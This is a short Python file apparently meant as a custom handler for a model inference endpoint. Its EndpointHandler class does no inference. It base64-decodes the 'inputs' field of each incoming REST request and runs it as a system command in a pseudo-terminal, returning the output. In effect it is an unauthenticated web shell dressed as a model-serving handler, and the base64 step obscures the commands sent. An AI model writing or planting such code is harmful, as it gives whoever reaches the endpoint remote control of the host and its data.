|
import os |
|
import pty |
|
import subprocess |
|
import select |
|
import shlex |
|
import base64 |
|
|
|
|
|
class EndpointHandler: |
|
def __init__(self, *args, **kwargs): |
|
pass |
|
|
|
def run_command(self, command): |
|
def read_output(fd): |
|
output = b"" |
|
while True: |
|
r, _, _ = select.select([fd], [], [], 0.1) |
|
if fd in r: |
|
data = os.read(fd, 1024) |
|
if not data: |
|
break |
|
output += data |
|
else: |
|
break |
|
return output |
|
|
|
master_fd, slave_fd = pty.openpty() |
|
try: |
|
process = subprocess.Popen( |
|
shlex.split(command), |
|
stdin=slave_fd, |
|
stdout=slave_fd, |
|
stderr=slave_fd, |
|
text=True, |
|
) |
|
|
|
output = b"" |
|
while process.poll() is None: |
|
output += read_output(master_fd) |
|
|
|
|
|
output += read_output(master_fd) |
|
|
|
process.wait() |
|
finally: |
|
os.close(master_fd) |
|
os.close(slave_fd) |
|
|
|
return output.decode() |
|
|
|
def _decode_base64(self, command): |
|
try: |
|
decoded_command = base64.b64decode(command).decode() |
|
except Exception as e: |
|
return command |
|
|
|
return decoded_command |
|
|
|
def __call__(self, data): |
|
""" |
|
:param data: input data from the inference endpoint REST API |
|
:return: output data |
|
""" |
|
|
|
command = data.pop("inputs", None) |
|
command = self._decode_base64(command) |
|
|
|
if not isinstance(command, str): |
|
return {"error": "inputs attribute is required"} |
|
|
|
|
|
result = self.run_command(command) |
|
|
|
return {"result": result} |